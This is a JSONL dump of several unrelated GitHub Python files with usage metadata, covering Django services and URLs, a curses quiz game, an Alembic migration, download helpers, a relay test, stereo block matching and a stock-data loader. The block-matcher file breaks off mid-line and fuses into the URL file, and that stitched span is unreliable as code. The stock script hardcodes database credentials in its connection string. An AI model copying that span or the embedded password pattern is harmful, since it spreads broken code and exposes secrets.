previous_block = criteria_blocks_qs.filter(\n position__lt=criteria_block.position\n ).order_by('-position').first()\n\n if not previous_block:\n previous_block = criteria_blocks_qs.filter(is_country_selector=True).first()\n return previous_block\n\n @staticmethod\n def get_later_blocks(criteria_block):\n return CriteriaBlock.objects.filter(\n criteria=criteria_block.criteria,\n position__gt=criteria_block.position\n ).order_by('position')\n\n def decrement_later_blocks_position(self, criteria_block: CriteriaBlock):\n self.get_later_blocks(criteria_block=criteria_block).update(position=F('position') - 1)\n\n def increment_later_blocks_position(self, criteria_block: CriteriaBlock):\n self.get_later_blocks(criteria_block=criteria_block).update(position=F('position') + 1)\n\n @staticmethod\n def delete_block_connectors(criteria_block):\n criteria_block.block_connected_to.all().delete()\n\n @staticmethod\n def connect_blocks(from_block: CriteriaBlock, to_block: CriteriaBlock):\n if not (from_block and to_block):\n return\n CriteriaBlockConnector.objects.create(\n from_block=from_block,\n to_block=to_block,\n condition='AND'\n )\n", "repo_name": "tayyabsaleem7756/jobtest", "sub_path": "backend/retail_market/api/eligibility_criteria/services/admin/criteria_block_update_mixin.py", "file_name": "criteria_block_update_mixin.py", "file_ext": "py", "file_size_in_byte": 2690, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 8, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 9, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 9, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 19, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.FundEligibilityCriteria", "line_number": 29, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 30, 
"usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 30, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 36, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 37, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 48, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.F", "line_number": 54, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.F", "line_number": 57, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlock", "line_number": 64, "usage_type": "name"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlockConnector.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlockConnector.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "api.eligibility_criteria.models.CriteriaBlockConnector", "line_number": 67, "usage_type": "name"}]}
+{"seq_id": "19185802201", "text": "# Created by BaiJiFeiLong@gmail.com at 2020/5/14 18:51\n\nfrom PySide2 import QtWidgets\n\nfrom ppledigester import log_utils\nfrom ppledigester.common import translator\n\n\nclass DigesterWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.logger = log_utils.get_logger(\"MainWindow\")\n self.resize(600, 400)\n self.logger.info(\"Window resize to 600x400\")\n self.statusBar().showMessage(translator.translate(\"DRAG_TIP\"))\n self.logger.info(\"The tip in status bar is shown.\")\n", "repo_name": "baijifeilong/pple-digester", "sub_path": "ppledigester/digester_window.py", "file_name": "digester_window.py", "file_ext": "py", "file_size_in_byte": 534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySide2.QtWidgets.QMainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 9, "usage_type": "name"}, {"api_name": "ppledigester.log_utils.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "ppledigester.log_utils", "line_number": 12, "usage_type": "name"}, {"api_name": "ppledigester.common.translator.translate", "line_number": 15, "usage_type": "call"}, {"api_name": "ppledigester.common.translator", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "32776134118", "text": "# Writing Game Mode:\n#\n# \n# \n# \n# \n# \n# \n# \n# \n# \n# \n\n\nimport curses\nimport random\n\nfrom src.utils.enums import Topic, ReturnTo, GameMode, MenuOption\nfrom src.utils.colors import Color\nfrom src.utils.japanese import Character\nfrom src.utils.question import QuestionGenerator, Question\nfrom src.curses_menu import SelectionMenu, Menu, TextMenuItem, ButtonMenuItem, ProgressBar, ExtendingText, draw_header\nfrom src .routes.summary import summary_route\n\n\n\ndef challenge_route(stdscr, topic: Topic, game_mode: GameMode, characters: list[Character]):\n height, width = stdscr.getmaxyx()\n\n # Subwindowing\n header_win = stdscr.derwin(5, width, 0, 0)\n progress_win = stdscr.derwin(1, width, 6, 0)\n question_no_win = stdscr.derwin(1, width, 8, 0)\n question_win = stdscr.derwin(2, width, 10, 0)\n menu_win = stdscr.derwin(5, width, 13, 0)\n answer_win = stdscr.derwin(4, width, 18, 0)\n prompt_win = stdscr.derwin(4, width, 23, 0)\n\n # CLI Loop\n return_value = ReturnTo.CHALLENGE\n\n while return_value >= ReturnTo.CHALLENGE:\n stdscr.clear()\n stdscr.refresh()\n\n characters_copy_shuffled: list[Character] = [*characters]\n random.shuffle(characters_copy_shuffled)\n\n # Initialize QuestionGenerator. Pass in the copy of characters array,\n # Do not pass in original copy because the player might want to try again later\n question_gen = QuestionGenerator(\n topic,\n game_mode,\n characters_copy_shuffled\n )\n\n # Progress initialization\n progress_bar = ProgressBar.preset_shade(\n progress_win,\n maximum=len(characters),\n text_color=Color.YELLOW | curses.A_BOLD\n )\n\n # header\n title = 'Writing 书 写' if game_mode == GameMode.WRITING else \\\n 'Recognition 辨 识' if game_mode == GameMode.RECOGNITION else \\\n 'Mixed 混 合'\n draw_header(\n header_win,\n f\"✰♫♪•*¨·٠•●♥✿ ▁▁▂▂▃▃▅▅▆▆▇▇ {title} ▇▇▆▆▅▅▃▃▂▂▁▁ ✿♥●•٠·¨*•♪♫✰\",\n text_color=Color.RED\n )\n\n\n # Question Loop\n for i, question in enumerate(question_gen):\n # Progress bar update\n progress_bar.update(i + 1)\n\n # Clear the windows before question number animates (blocking)\n menu_win.clear()\n menu_win.refresh()\n question_win.clear()\n question_win.refresh()\n answer_win.clear()\n answer_win.refresh()\n\n # Question number\n ExtendingText(\n question_no_win,\n f'Question {i+1}',\n delay=0.05,\n text_color=Color.BLUE | curses.A_BOLD\n ).run()\n\n # Question\n question_win.addstr( question.question, curses.A_BOLD )\n question_win.refresh()\n\n # Menu - Enclose in a loop to avoid redrawing the progress bar & questions\n # The question handlers return either True or False.\n # True - Continue to next question (Next iteration of for loop)\n # False - User selected \"Quit\". Continue to summary.\n if question.game_mode == GameMode.WRITING:\n if not writing_question_handler(question, menu_win, answer_win, prompt_win):\n break\n else:\n if not recognition_question_handler(question, menu_win, answer_win, prompt_win):\n break\n\n return_value = summary_route(stdscr, question_gen)\n return return_value\n\n\n\n\n\n\n# Handles display and input for a GameMode.WRITING question\n# Returns FALSE if the user selects to QUIT; True if user selects to proceed\ndef writing_question_handler(\n question: Question,\n menu_win,\n answer_win,\n prompt_win\n):\n # Prompt window\n prompt_win.clear()\n prompt_win.addstr(\n \"[Use UP/DOWN arrow to change selection.]\\n\"\n \"[Use ENTER to select.]\\n\",\n Color.GREEN | curses.A_BOLD\n )\n prompt_win.refresh()\n\n # Menu handling\n menu = SelectionMenu(\n menu_win,\n ['Done. 
Proceed', 'Peek answer', 'Quit'],\n highlight_color=Color.CYAN\n )\n\n while True:\n value = menu.run()\n # Proceed\n if value == 0:\n return True\n # Peek answer\n elif value == 1:\n question.peeked = True\n answer_win.clear()\n answer_win.addstr(f\"Answer: ({question.answer} )\")\n answer_win.refresh()\n else:\n return False\n\n\n\n\n\n# Handles display and input for a GameMode.RECOGNITION question\n# Returns FALSE if the user selects to QUIT; True if user selects to proceed\ndef recognition_question_handler(\n question: Question,\n menu_win,\n answer_win,\n prompt_win\n):\n # Prompt window\n prompt_win.clear()\n prompt_win.addstr(\n \"[Use UP/DOWN arrow to change selection.]\\n\"\n \"[Use ENTER to select.]\\n\"\n \"[Type in the romaji, BACKSPACE to delete, and ENTER to proceed]\",\n Color.GREEN | curses.A_BOLD\n )\n prompt_win.refresh()\n\n # Menu handling\n menu = Menu(menu_win)\n menu.add_menu_item('0', TextMenuItem.factory(\n 'Enter the romaji: ',\n return_on_enter=True,\n highlight_color=Color.CYAN\n ))\n menu.add_menu_item('1', ButtonMenuItem.factory(\n 'Peek Answer',\n lambda: MenuOption.PEEK_ANS,\n highlight_color=Color.CYAN\n ))\n menu.add_menu_item('2', ButtonMenuItem.factory(\n 'Quit',\n lambda: MenuOption.CANCEL,\n highlight_color=Color.CYAN\n ))\n\n while True:\n value = menu.run()\n # Peek answer\n if value == MenuOption.PEEK_ANS:\n question.peeked = True\n answer_win.clear()\n answer_win.addstr(f\"Answer: ({question.answer} )\")\n answer_win.refresh()\n # Quit\n elif value == MenuOption.CANCEL: return False\n # Check answer, show the correct one and ask to press any key before proceeding.\n else:\n question.player_ans = value\n\n answer_win.clear()\n answer_win.addstr(f\"Your answer is: \")\n answer_win.addstr(value, curses.A_BOLD)\n\n if value == question.answer:\n answer_win.addstr(\"\\nYou answered correctly!\", Color.GREEN | curses.A_BOLD)\n else:\n answer_win.addstr(f\"\\nThat is incorrect. 
Answer: ({question.answer} )\", Color.RED | curses.A_BOLD)\n\n answer_win.addstr(f'\\n\\nPress any key to continue...', Color.YELLOW | curses.A_BOLD)\n answer_win.refresh()\n answer_win.getch()\n return True\n", "repo_name": "AdmiJW/JapaneseMemorizer", "sub_path": "src/routes/challenge.py", "file_name": "challenge.py", "file_ext": "py", "file_size_in_byte": 6866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.utils.enums.Topic", "line_number": 27, "usage_type": "name"}, {"api_name": "src.utils.enums.GameMode", "line_number": 27, "usage_type": "name"}, {"api_name": "src.utils.japanese.Character", "line_number": 27, "usage_type": "name"}, {"api_name": "src.utils.enums.ReturnTo.CHALLENGE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "src.utils.enums.ReturnTo", "line_number": 40, "usage_type": "name"}, {"api_name": "src.utils.enums.ReturnTo.CHALLENGE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "src.utils.enums.ReturnTo", "line_number": 42, "usage_type": "name"}, {"api_name": "src.utils.japanese.Character", "line_number": 46, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 47, "usage_type": "call"}, {"api_name": "src.utils.question.QuestionGenerator", "line_number": 51, "usage_type": "call"}, {"api_name": "src.curses_menu.ProgressBar.preset_shade", "line_number": 58, "usage_type": "call"}, {"api_name": "src.curses_menu.ProgressBar", "line_number": 58, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.YELLOW", "line_number": 61, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 61, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 61, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode.WRITING", "line_number": 65, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode", "line_number": 65, "usage_type": "name"}, {"api_name": "src.utils.enums.GameMode.RECOGNITION", "line_number": 66, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode", "line_number": 66, "usage_type": "name"}, {"api_name": "src.curses_menu.draw_header", "line_number": 68, "usage_type": "call"}, {"api_name": "src.utils.colors.Color.RED", "line_number": 71, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 71, "usage_type": "name"}, {"api_name": "src.curses_menu.ExtendingText", "line_number": 89, "usage_type": "call"}, {"api_name": "src.utils.colors.Color.BLUE", "line_number": 93, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 93, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 93, "usage_type": "attribute"}, {"api_name": "curses.A_BOLD", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode.WRITING", "line_number": 104, "usage_type": "attribute"}, {"api_name": "src.utils.enums.GameMode", "line_number": 104, "usage_type": "name"}, {"api_name": "src.routes.summary.summary_route", "line_number": 111, "usage_type": "call"}, {"api_name": "src.utils.question.Question", "line_number": 122, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.GREEN", "line_number": 132, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 132, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 132, "usage_type": "attribute"}, {"api_name": "src.curses_menu.SelectionMenu", "line_number": 137, "usage_type": "call"}, {"api_name": 
"src.utils.colors.Color.CYAN", "line_number": 140, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 140, "usage_type": "name"}, {"api_name": "src.utils.question.Question", "line_number": 164, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.GREEN", "line_number": 175, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 175, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 175, "usage_type": "attribute"}, {"api_name": "src.curses_menu.Menu", "line_number": 180, "usage_type": "call"}, {"api_name": "src.curses_menu.TextMenuItem.factory", "line_number": 181, "usage_type": "call"}, {"api_name": "src.curses_menu.TextMenuItem", "line_number": 181, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 184, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 184, "usage_type": "name"}, {"api_name": "src.curses_menu.ButtonMenuItem.factory", "line_number": 186, "usage_type": "call"}, {"api_name": "src.curses_menu.ButtonMenuItem", "line_number": 186, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.PEEK_ANS", "line_number": 188, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 188, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 189, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 189, "usage_type": "name"}, {"api_name": "src.curses_menu.ButtonMenuItem.factory", "line_number": 191, "usage_type": "call"}, {"api_name": "src.curses_menu.ButtonMenuItem", "line_number": 191, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.CANCEL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 193, "usage_type": "name"}, {"api_name": "src.utils.colors.Color.CYAN", "line_number": 194, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 194, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.PEEK_ANS", "line_number": 200, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 200, "usage_type": "name"}, {"api_name": "src.utils.enums.MenuOption.CANCEL", "line_number": 206, "usage_type": "attribute"}, {"api_name": "src.utils.enums.MenuOption", "line_number": 206, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 213, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color.GREEN", "line_number": 216, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 216, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 216, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color.RED", "line_number": 218, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 218, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 218, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color.YELLOW", "line_number": 220, "usage_type": "attribute"}, {"api_name": "src.utils.colors.Color", "line_number": 220, "usage_type": "name"}, {"api_name": "curses.A_BOLD", "line_number": 220, "usage_type": "attribute"}]}
+{"seq_id": "38123079401", "text": "\"\"\"Remove unnecessary fields\n\nRevision ID: 213734b12f44\nRevises: 80c172946a90\nCreate Date: 2018-09-08 11:08:47.168451\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = \"213734b12f44\"\ndown_revision = \"80c172946a90\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"project\", \"project_coemail\")\n op.drop_column(\"project\", \"project_creator\")\n op.drop_column(\"project\", \"project_cremail\")\n op.drop_column(\"project\", \"project_contact\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"project\",\n sa.Column(\"project_contact\", mysql.VARCHAR(length=120), nullable=True),\n )\n op.add_column(\n \"project\", sa.Column(\"project_cremail\", mysql.VARCHAR(length=45), nullable=True)\n )\n op.add_column(\n \"project\", sa.Column(\"project_creator\", mysql.VARCHAR(length=45), nullable=True)\n )\n op.add_column(\n \"project\", sa.Column(\"project_coemail\", mysql.VARCHAR(length=45), nullable=True)\n )\n # ### end Alembic commands ###\n", "repo_name": "qlands/FormShare", "sub_path": "alembic/versions/213734b12f44_remove_unnecessary_fields.py", "file_name": "213734b12f44_remove_unnecessary_fields.py", "file_ext": "py", "file_size_in_byte": 1246, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.drop_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 35, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 38, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, 
"usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "34380764956", "text": "import logging\nimport os\nfrom typing import Optional\n\nimport requests\n\nLOG = logging.getLogger(__name__)\n\n\nclass DownloadError(Exception):\n \"\"\"Represents an error during the download of a file.\n \"\"\"\n\n\ndef download_file(url: str, dest: str) -> None:\n \"\"\"Downloads a file from a remote host into the local filesystem.\n\n Supported protocols are:\n * HTTP\n * HTTPS\n\n Examples\n --------\n >>> download_file(\n 'http://localhost/file.txt', '/home/user/my-file.txt'\n )\n >>> download_file(\n 'https://user@pass:localhost/file.txt, '/home/user/my-file.txt'\n )\n\n :param url: The URL where the file is at.\n :type url: str\n :param dest: Path where the file is going to be downloaded at. Must\n contain name of the file.\n :type dest: str\n :raise DownloadError: If the download failed.\n \"\"\"\n LOG.debug('Creating path to: %s', dest)\n\n os.makedirs(os.path.dirname(dest), exist_ok=True)\n\n LOG.info(\"Downloading file from: '%s'\", url)\n\n with requests.get(url, stream=True) as request:\n if not request.ok:\n raise DownloadError(\n f'Download failed with: {request.status_code}\\n'\n f'{request.text}'\n )\n\n LOG.debug('Saving to: %s', dest)\n\n with open(dest, 'wb') as file:\n for chunk in request.iter_content(chunk_size=8 * 1024):\n file.write(chunk)\n\n\ndef download_into_memory(url: str,\n session: Optional[requests.Session] = None\n ) -> str:\n \"\"\"Downloads the contents of a URL into memory, leaving the filesystem\n untouched.\n\n Supported protocols are:\n * HTTP\n * HTTPS\n\n .. doctest::\n >>> download_into_memory('http://localhost/file.txt')\n\n :param url: URL to download.\n :param session: Session used to perform request. This function will not\n close the session, that task is up to the caller.\n :return: Contents of the page.\n :raise DownloadError: If the download failed.\n \"\"\"\n LOG.info(\"Downloading file from: '%s'\", url)\n\n request = session.get(url) if session else requests.get(url)\n\n if not request.ok:\n raise DownloadError(\n f'Download failed with: {request.status_code}\\n'\n f'{request.text}'\n )\n\n return request.content.decode()\n", "repo_name": "RedHatCRE/cibyl", "sub_path": "kernel/tools/net.py", "file_name": "net.py", "file_ext": "py", "file_size_in_byte": 2369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 59, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 59, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "26165203571", "text": "import configparser\n\nfrom waveshare_defs import WaveshareDef\nfrom relaycontrolmain import WaveshareRelayController\nimport time\n\nif __name__ == \"__main__\":\n\n # read in the global app config\n config = configparser.ConfigParser()\n config.read('testcfg.cfg')\n\n serial_port = config.get(\"DEFAULT\", \"serial_port\")\n\n default_states_str = config.get(\"DEFAULT\", \"default_relay_states\")\n\n # ensure we can convert to channel int\n print(int(WaveshareDef.CH1.value))\n\n print(WaveshareDef.from_channel_def(1))\n\n # initialize the WaveshareRelayController class\n relay_controller = WaveshareRelayController(serial_port)\n\n # connect the serial port\n relay_controller.connect()\n\n # turn off all the relays\n relay_controller.set_default_state()\n time.sleep(1.0)\n\n # iterate through all the channels and turn each one on\n for ch in WaveshareDef:\n relay_controller.set_channel_on(ch)\n time.sleep(0.5)\n\n # iterate through all the channels and turn each one off\n for ch in WaveshareDef:\n relay_controller.set_channel_off(ch)\n time.sleep(0.5)\n\n", "repo_name": "ElDuderino/WaveshareRelayControl", "sub_path": "tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "configparser.ConfigParser", "line_number": 10, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef.CH1", "line_number": 18, "usage_type": "attribute"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 18, "usage_type": "name"}, {"api_name": "waveshare_defs.WaveshareDef.from_channel_def", "line_number": 20, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 20, "usage_type": "name"}, {"api_name": "relaycontrolmain.WaveshareRelayController", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 33, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "waveshare_defs.WaveshareDef", "line_number": 38, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "13820753260", "text": "import numpy as np\nimport cv2\nimport math\n\n\nclass BlockMatcher:\n def __init__(self, window_size,max_disparity):\n self.window_size=window_size\n self.window_half_size=math.ceil(self.window_size/2)\n self.max_disparity=max_disparity\n self.scaler=255/max_disparity #scale factor\n\n def compute(self,left_image,right_image,transform_method, match_method):\n assert left_image.shape==right_image.shape\n self.height,self.width=left_image.shape\n left=self.__get_tranformer(transform_method)(left_image)\n right=self.__get_tranformer(transform_method)(right_image)\n disparity=self.__get_matcher(match_method)(left,right)\n\n return disparity\n\n def __get_tranformer(self,method):\n if method==\"rank\":\n return self.__rank_transform\n else:\n raise NotImplemented\n\n def __get_matcher(self,method):\n if method==\"sse\":\n return self.__sse_match\n else:\n raise NotImplemented \n\n def __rank_transform(self,image):\n result=np.zeros((self.height,self.width))\n \n for i in range(self.height-self.window_size+1):\n for j in range(self.width-self.window_size+1):\n anchor=image[i+self.window_half_size,j+self.window_half_size] \n value=(image[i:i+self.window_size,j:j+self.window_size]> anchor).sum() \n result[i+self.window_half_size,j+self.window_half_size]=value\n\n return result\n\n def __sse_match(self,left,right):\n result=np.zeros((self.height,self.width))\n #sum of square error\n for i in range(self.height-self.window_size+1):\n for j in range(self.width-self.window_size+1):\n sse=float('inf')\n best_disparity=0\n for d in range(self.max_disparity+1):\n if (j-d<0):\n continue\n left_block=left[i:i+self.window_size,j:j+self.window_size]\n right_block=right[i:i+self.window_size,j-d:j-d+self.window_size]\n sse_compute=((left_block-right_block)*(left_block-right_block)).sum()\n if (sse_compute /ingredients\",\n views.IngredientCreateView.as_view(),\n name=\"new-ingredient\",\n ),\n path(\n \"recipes/public\",\n views.RecipeListPublicView.as_view(),\n name=\"recipe-list-public\",\n ),\n path(\"recipes/\", views.RecipeDetailView.as_view(), name=\"recipe-detail\"),\n path(\"recipes//copy\", views.RecipeCopyView.as_view(), name=\"recipe-copy\"),\n path(\"admin/users\", views.UserListAdminView.as_view(), name=\"user-list\"),\n path(\n \"mealplan///\",\n views.MealPlanView.as_view(),\n name=\"mealplan\",\n ),\n path(\n \"recipes//publish\",\n views.RecipePublishView.as_view(),\n name=\"recipe-publish\",\n ),\n path(\"auth/\", include(\"djoser.urls\")),\n path(\"auth/\", include(\"djoser.urls.authtoken\")),\n]\n", "repo_name": "Momentum-Team-14/example-django-recipes", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1057, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": 
"django.urls.include", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "16442136805", "text": "# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import create_engine\nimport tushare as ts\nimport datetime\nimport models\n\nsock_list = []\nengine = create_engine('postgresql://sock-user:sock-password@10.6.3.29:15432/sock-db')\n\ndb_session = None\n\ndef ticks_get_date(sock_list, date=''):\n # import pdb;pdb.set_trace()\n today_data = datetime.datetime.now().date().strftime(\"%Y-%m-%d\")\n if (not date) or (date == today_data):\n target_data = today_data\n func = ts.get_today_ticks\n use_date = False\n else:\n target_data = date\n func = ts.get_tick_data\n use_date = True\n for sock in sock_list:\n print('download {} ...'.format(sock))\n df = func(sock, date=target_data, src='tt') if use_date else func(sock)\n # df = df[df['time'].str.contains('09:30:[0-9]{2}')]\n df['code'] = sock\n df['date'] = target_data\n print('')\n print('download finished! save to db ...')\n table_name = 'ticks_table'\n df.to_sql(table_name, engine, if_exists='append', index=False)\n print('save finished!')\n\ndef init_sock_list():\n\n socklist = db_session.query(models.StockList).all()\n if socklist:\n print('sock list has been inited')\n return\n\n df = ts.get_today_all()\n table_name = 'stocks_list'\n del df['changepercent']\n del df['trade']\n del df['open']\n del df['high']\n del df['low']\n del df['settlement']\n del df['volume']\n del df['turnoverratio']\n del df['amount']\n del df['per']\n del df['pb']\n del df['mktcap']\n del df['nmc']\n df.to_sql(table_name, engine, if_exists='append', index=False)\n print('save 